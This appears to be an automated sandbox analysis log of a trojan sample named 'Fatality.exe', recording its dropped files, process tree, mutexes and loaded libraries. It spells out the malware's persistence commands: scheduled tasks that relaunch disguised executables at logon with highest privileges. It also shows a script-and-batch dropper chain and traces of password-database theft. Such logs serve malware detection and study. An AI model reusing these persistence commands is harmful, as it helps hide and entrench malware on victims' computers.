                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: c:\Windows\System32\SecurityHealthSystray.exeJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile deleted: C:\Windows\System32\CSCC3741A71028464F81756764D7843821.TMPJump to behavior
                              Source: C:\Users\user\Desktop\Fatality.exeCode function: 0_2_009930B60_2_009930B6
                              Source: C:\Users\user\Desktop\Fatality.exeCode function: 0_2_04D545710_2_04D54571
                              Source: C:\Bridgemonitor\BridgeInto.exeCode function: 6_2_00007FFD34660D4C6_2_00007FFD34660D4C
                              Source: C:\Bridgemonitor\BridgeInto.exeCode function: 6_2_00007FFD34660E436_2_00007FFD34660E43
                              Source: C:\Bridgemonitor\BridgeInto.exeCode function: 6_2_00007FFD34A5CDDD6_2_00007FFD34A5CDDD
                              Source: C:\Bridgemonitor\BridgeInto.exeCode function: 6_2_00007FFD34A5A69E6_2_00007FFD34A5A69E
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeCode function: 25_2_00007FFD346A196825_2_00007FFD346A1968
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeCode function: 25_2_00007FFD346AFCFA25_2_00007FFD346AFCFA
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeCode function: 25_2_00007FFD346B1F5825_2_00007FFD346B1F58
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeCode function: 25_2_00007FFD346B1EFA25_2_00007FFD346B1EFA
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeCode function: 25_2_00007FFD346AFBD825_2_00007FFD346AFBD8
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeCode function: 25_2_00007FFD34680ED125_2_00007FFD34680ED1
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeCode function: 25_2_00007FFD346802D325_2_00007FFD346802D3
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeCode function: 25_2_00007FFD34670D4C25_2_00007FFD34670D4C
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeCode function: 25_2_00007FFD34670E4325_2_00007FFD34670E43
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeCode function: 25_2_00007FFD34A6CC5125_2_00007FFD34A6CC51
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeCode function: 25_2_00007FFD34A6A69E25_2_00007FFD34A6A69E
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeCode function: 25_2_00007FFD34B9407925_2_00007FFD34B94079
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeCode function: 25_2_00007FFD34B9425225_2_00007FFD34B94252
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeCode function: 25_2_00007FFD34B9DA0525_2_00007FFD34B9DA05
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeCode function: 25_2_00007FFD34B95E5D25_2_00007FFD34B95E5D
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeCode function: 25_2_00007FFD34B92A7925_2_00007FFD34B92A79
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeCode function: 25_2_00007FFD34B9400125_2_00007FFD34B94001
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeCode function: 25_2_00007FFD34B93FC725_2_00007FFD34B93FC7
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeCode function: 25_2_00007FFD34B93F6525_2_00007FFD34B93F65
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeCode function: 25_2_00007FFD34B9437A25_2_00007FFD34B9437A
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeCode function: 28_2_00007FFD34690D4C28_2_00007FFD34690D4C
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeCode function: 28_2_00007FFD34690E4328_2_00007FFD34690E43
                              Source: C:\Bridgemonitor\BridgeInto.exeCode function: 39_2_00007FFD3469196839_2_00007FFD34691968
                              Source: C:\Bridgemonitor\BridgeInto.exeCode function: 39_2_00007FFD34660D4C39_2_00007FFD34660D4C
                              Source: C:\Bridgemonitor\BridgeInto.exeCode function: 39_2_00007FFD34660E4339_2_00007FFD34660E43
                              Source: C:\Bridgemonitor\BridgeInto.exeCode function: 39_2_00007FFD346714C139_2_00007FFD346714C1
                              Source: C:\Bridgemonitor\BridgeInto.exeCode function: 39_2_00007FFD346714AC39_2_00007FFD346714AC
                              Source: C:\Bridgemonitor\BridgeInto.exeCode function: 39_2_00007FFD3467146839_2_00007FFD34671468
                              Source: C:\Bridgemonitor\BridgeInto.exeCode function: 39_2_00007FFD34670E2639_2_00007FFD34670E26
                              Source: C:\Bridgemonitor\BridgeInto.exeCode function: 39_2_00007FFD346702D339_2_00007FFD346702D3
                              Source: C:\Bridgemonitor\BridgeInto.exeCode function: 39_2_00007FFD346712D039_2_00007FFD346712D0
                              Source: C:\Bridgemonitor\BridgeInto.exeCode function: 39_2_00007FFD3467135839_2_00007FFD34671358
                              Source: C:\Bridgemonitor\BridgeInto.exeCode function: 39_2_00007FFD3467131439_2_00007FFD34671314
                              Source: C:\Bridgemonitor\BridgeInto.exeCode function: 39_2_00007FFD3467139C39_2_00007FFD3467139C
                              Source: C:\Bridgemonitor\BridgeInto.exeCode function: 39_2_00007FFD3467142439_2_00007FFD34671424
                              Source: C:\Bridgemonitor\BridgeInto.exeCode function: 39_2_00007FFD346713E039_2_00007FFD346713E0
                              Source: C:\Bridgemonitor\BridgeInto.exeCode function: 40_2_00007FFD34650D4C40_2_00007FFD34650D4C
                              Source: C:\Bridgemonitor\BridgeInto.exeCode function: 40_2_00007FFD34650E4340_2_00007FFD34650E43
                              Source: C:\Recovery\dllhost.exeCode function: 41_2_00007FFD34690D4C41_2_00007FFD34690D4C
                              Source: C:\Recovery\dllhost.exeCode function: 41_2_00007FFD34690E4341_2_00007FFD34690E43
                              Source: C:\Recovery\dllhost.exeCode function: 41_2_00007FFD346A14C141_2_00007FFD346A14C1
                              Source: C:\Recovery\dllhost.exeCode function: 41_2_00007FFD346A14AC41_2_00007FFD346A14AC
                              Source: C:\Recovery\dllhost.exeCode function: 41_2_00007FFD346A146841_2_00007FFD346A1468
                              Source: C:\Recovery\dllhost.exeCode function: 41_2_00007FFD346A0E2641_2_00007FFD346A0E26
                              Source: C:\Recovery\dllhost.exeCode function: 41_2_00007FFD346A12D041_2_00007FFD346A12D0
                              Source: C:\Recovery\dllhost.exeCode function: 41_2_00007FFD346A02D341_2_00007FFD346A02D3
                              Source: C:\Recovery\dllhost.exeCode function: 41_2_00007FFD346A135841_2_00007FFD346A1358
                              Source: C:\Recovery\dllhost.exeCode function: 41_2_00007FFD346A131441_2_00007FFD346A1314
                              Source: C:\Recovery\dllhost.exeCode function: 41_2_00007FFD346A139C41_2_00007FFD346A139C
                              Source: C:\Recovery\dllhost.exeCode function: 41_2_00007FFD346A142441_2_00007FFD346A1424
                              Source: C:\Recovery\dllhost.exeCode function: 41_2_00007FFD346A13E041_2_00007FFD346A13E0
                              Source: C:\Recovery\dllhost.exeCode function: 41_2_00007FFD346C196841_2_00007FFD346C1968
                              Source: C:\Recovery\dllhost.exeCode function: 42_2_00007FFD34670D4C42_2_00007FFD34670D4C
                              Source: C:\Recovery\dllhost.exeCode function: 42_2_00007FFD34670E4342_2_00007FFD34670E43
                              Source: Joe Sandbox ViewDropped File: C:\Bridgemonitor\BridgeInto.exe 6A397C6E1041AD55295C3FE2CF7F795DA853004C1A02E1D77C65F0DA86AD312E
                              Source: Joe Sandbox ViewDropped File: C:\Program Files (x86)\Microsoft.NET\RedistList\EoNanmDGxPEtougVgAjHLx.exe 6A397C6E1041AD55295C3FE2CF7F795DA853004C1A02E1D77C65F0DA86AD312E
                              Source: Joe Sandbox ViewDropped File: C:\Program Files\Microsoft Office 15\ClientX64\EoNanmDGxPEtougVgAjHLx.exe 6A397C6E1041AD55295C3FE2CF7F795DA853004C1A02E1D77C65F0DA86AD312E
                              Source: C:\Users\user\Desktop\Fatality.exeCode function: String function: 00986264 appears 73 times
                              Source: Fatality.exeBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs Fatality.exe
                              Source: Fatality.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                              Source: BridgeInto.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: WinStore.App.exe.6.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: dllhost.exe.6.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: EoNanmDGxPEtougVgAjHLx.exe.6.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: EoNanmDGxPEtougVgAjHLx.exe0.6.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: EoNanmDGxPEtougVgAjHLx.exe1.6.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: Fatality.exeStatic PE information: Section: ZLIB complexity 0.9972848934977578
                              Source: Fatality.exeStatic PE information: Section: ZLIB complexity 0.9947916666666666
                              Source: Fatality.exeStatic PE information: Section: cheat ZLIB complexity 0.9969740316901409
                              Source: classification engineClassification label: mal100.spre.troj.spyw.expl.evad.winEXE@53/59@1/1
                              Source: C:\Bridgemonitor\BridgeInto.exeFile created: C:\Program Files\Microsoft Office 15\ClientX64\EoNanmDGxPEtougVgAjHLx.exeJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeFile created: C:\Users\user\Desktop\nKZvhtVR.logJump to behavior
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5588:120:WilError_03
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6976:120:WilError_03
                              Source: C:\Recovery\dllhost.exeMutant created: NULL
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4512:120:WilError_03
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeMutant created: \Sessions\1\BaseNamedObjects\Local\DCR_MUTEX-NUz87R2ScA5J4vD9Ssui
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2304:120:WilError_03
                              Source: C:\Bridgemonitor\BridgeInto.exeFile created: C:\Users\user\AppData\Local\Temp\5qzorvzbJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Bridgemonitor\zS0fKDlKT05bxtO58C1eiBYQ1f.bat" "
                              Source: C:\Users\user\Desktop\Fatality.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                              Source: C:\Users\user\Desktop\Fatality.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                              Source: Fatality.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                              Source: C:\Bridgemonitor\BridgeInto.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Bridgemonitor\BridgeInto.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Bridgemonitor\BridgeInto.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Bridgemonitor\BridgeInto.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Bridgemonitor\BridgeInto.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Bridgemonitor\BridgeInto.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Bridgemonitor\BridgeInto.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Bridgemonitor\BridgeInto.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Bridgemonitor\BridgeInto.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Bridgemonitor\BridgeInto.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Bridgemonitor\BridgeInto.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Bridgemonitor\BridgeInto.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Bridgemonitor\BridgeInto.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Bridgemonitor\BridgeInto.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Bridgemonitor\BridgeInto.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Bridgemonitor\BridgeInto.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Bridgemonitor\BridgeInto.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Bridgemonitor\BridgeInto.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                              Source: C:\Users\user\Desktop\Fatality.exeFile read: C:\Windows\win.iniJump to behavior
                              Source: C:\Users\user\Desktop\Fatality.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                              Source: mEhQIJUl58.25.dr, k7wqnbxppA.25.dr, dNXxAgck8g.25.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                              Source: Fatality.exeReversingLabs: Detection: 78%
                              Source: Fatality.exeVirustotal: Detection: 84%
                              Source: C:\Users\user\Desktop\Fatality.exeFile read: C:\Users\user\Desktop\Fatality.exeJump to behavior
                              Source: unknownProcess created: C:\Users\user\Desktop\Fatality.exe "C:\Users\user\Desktop\Fatality.exe"
                              Source: unknownProcess created: C:\Windows\System32\dllhost.exe C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                              Source: C:\Users\user\Desktop\Fatality.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Bridgemonitor\Xaqgc4UniUxink9TEvtSaN4iIb.vbe"
                              Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Bridgemonitor\zS0fKDlKT05bxtO58C1eiBYQ1f.bat" "
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Bridgemonitor\BridgeInto.exe "C:\Bridgemonitor/BridgeInto.exe"
                              Source: unknownProcess created: C:\Windows\System32\dllhost.exe C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
                              Source: unknownProcess created: C:\Windows\System32\dllhost.exe C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "EoNanmDGxPEtougVgAjHLxE" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\microsoft.net\RedistList\EoNanmDGxPEtougVgAjHLx.exe'" /f
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "EoNanmDGxPEtougVgAjHLx" /sc ONLOGON /tr "'C:\Program Files (x86)\microsoft.net\RedistList\EoNanmDGxPEtougVgAjHLx.exe'" /rl HIGHEST /f
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "EoNanmDGxPEtougVgAjHLxE" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\microsoft.net\RedistList\EoNanmDGxPEtougVgAjHLx.exe'" /rl HIGHEST /f
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5qzorvzb\5qzorvzb.cmdline"
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESDC85.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC48DFCF3E932B4A62A92F13B5F615A1E.TMP"
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2csyxc1q\2csyxc1q.cmdline"
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESDE79.tmp" "c:\Windows\System32\CSCC3741A71028464F81756764D7843821.TMP"
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "EoNanmDGxPEtougVgAjHLxE" /sc MINUTE /mo 11 /tr "'C:\Program Files\Microsoft Office 15\ClientX64\EoNanmDGxPEtougVgAjHLx.exe'" /f
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "EoNanmDGxPEtougVgAjHLx" /sc ONLOGON /tr "'C:\Program Files\Microsoft Office 15\ClientX64\EoNanmDGxPEtougVgAjHLx.exe'" /rl HIGHEST /f
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "EoNanmDGxPEtougVgAjHLxE" /sc MINUTE /mo 9 /tr "'C:\Program Files\Microsoft Office 15\ClientX64\EoNanmDGxPEtougVgAjHLx.exe'" /rl HIGHEST /f
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "EoNanmDGxPEtougVgAjHLxE" /sc MINUTE /mo 6 /tr "'C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe'" /f
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "EoNanmDGxPEtougVgAjHLx" /sc ONLOGON /tr "'C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe'" /rl HIGHEST /f
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "EoNanmDGxPEtougVgAjHLxE" /sc MINUTE /mo 11 /tr "'C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe'" /rl HIGHEST /f
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 5 /tr "'C:\Recovery\dllhost.exe'" /f
                              Source: unknownProcess created: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Recovery\dllhost.exe'" /rl HIGHEST /f
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 11 /tr "'C:\Recovery\dllhost.exe'" /rl HIGHEST /f
                              Source: unknownProcess created: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WinStore.App" /sc ONLOGON /tr "'C:\Users\All Users\ssh\WinStore.App.exe'" /rl HIGHEST /f
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WinStore.AppW" /sc MINUTE /mo 14 /tr "'C:\Users\All Users\ssh\WinStore.App.exe'" /rl HIGHEST /f
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "BridgeIntoB" /sc MINUTE /mo 10 /tr "'C:\Bridgemonitor\BridgeInto.exe'" /f
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "BridgeInto" /sc ONLOGON /tr "'C:\Bridgemonitor\BridgeInto.exe'" /rl HIGHEST /f
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "BridgeIntoB" /sc MINUTE /mo 9 /tr "'C:\Bridgemonitor\BridgeInto.exe'" /rl HIGHEST /f
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\2EcQa8wgx4.bat"
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                              Source: unknownProcess created: C:\Bridgemonitor\BridgeInto.exe C:\Bridgemonitor\BridgeInto.exe
                              Source: unknownProcess created: C:\Bridgemonitor\BridgeInto.exe C:\Bridgemonitor\BridgeInto.exe
                              Source: unknownProcess created: C:\Recovery\dllhost.exe C:\Recovery\dllhost.exe
                              Source: unknownProcess created: C:\Recovery\dllhost.exe C:\Recovery\dllhost.exe
                              Source: C:\Users\user\Desktop\Fatality.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Bridgemonitor\Xaqgc4UniUxink9TEvtSaN4iIb.vbe" Jump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Bridgemonitor\zS0fKDlKT05bxtO58C1eiBYQ1f.bat" "Jump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Bridgemonitor\BridgeInto.exe "C:\Bridgemonitor/BridgeInto.exe"Jump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5qzorvzb\5qzorvzb.cmdline"Jump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2csyxc1q\2csyxc1q.cmdline"Jump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "EoNanmDGxPEtougVgAjHLxE" /sc MINUTE /mo 11 /tr "'C:\Program Files\Microsoft Office 15\ClientX64\EoNanmDGxPEtougVgAjHLx.exe'" /fJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESDC85.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC48DFCF3E932B4A62A92F13B5F615A1E.TMP"Jump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESDE79.tmp" "c:\Windows\System32\CSCC3741A71028464F81756764D7843821.TMP"Jump to behavior
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                              Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                              Source: C:\Users\user\Desktop\Fatality.exeSection loaded: version.dllJump to behavior
                              Source: C:\Users\user\Desktop\Fatality.exeSection loaded: shfolder.dllJump to behavior
                              Source: C:\Users\user\Desktop\Fatality.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Users\user\Desktop\Fatality.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Users\user\Desktop\Fatality.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Users\user\Desktop\Fatality.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\Fatality.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Users\user\Desktop\Fatality.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                              Source: C:\Users\user\Desktop\Fatality.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                              Source: C:\Users\user\Desktop\Fatality.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                              Source: C:\Users\user\Desktop\Fatality.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                              Source: C:\Users\user\Desktop\Fatality.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dllJump to behavior
                              Source: C:\Users\user\Desktop\Fatality.exeSection loaded: dxgidebug.dllJump to behavior
                              Source: C:\Users\user\Desktop\Fatality.exeSection loaded: sfc_os.dllJump to behavior
                              Source: C:\Users\user\Desktop\Fatality.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Users\user\Desktop\Fatality.exeSection loaded: dwmapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\Fatality.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Users\user\Desktop\Fatality.exeSection loaded: riched20.dllJump to behavior
                              Source: C:\Users\user\Desktop\Fatality.exeSection loaded: usp10.dllJump to behavior
                              Source: C:\Users\user\Desktop\Fatality.exeSection loaded: msls31.dllJump to behavior
                              Source: C:\Users\user\Desktop\Fatality.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Users\user\Desktop\Fatality.exeSection loaded: windowscodecs.dllJump to behavior
                              Source: C:\Users\user\Desktop\Fatality.exeSection loaded: textshaping.dllJump to behavior
                              Source: C:\Users\user\Desktop\Fatality.exeSection loaded: textinputframework.dllJump to behavior
                              Source: C:\Users\user\Desktop\Fatality.exeSection loaded: coreuicomponents.dllJump to behavior
                              Source: C:\Users\user\Desktop\Fatality.exeSection loaded: coremessaging.dllJump to behavior
                              Source: C:\Users\user\Desktop\Fatality.exeSection loaded: ntmarta.dllJump to behavior
                              Source: C:\Users\user\Desktop\Fatality.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Users\user\Desktop\Fatality.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Users\user\Desktop\Fatality.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Users\user\Desktop\Fatality.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Users\user\Desktop\Fatality.exeSection loaded: edputil.dllJump to behavior
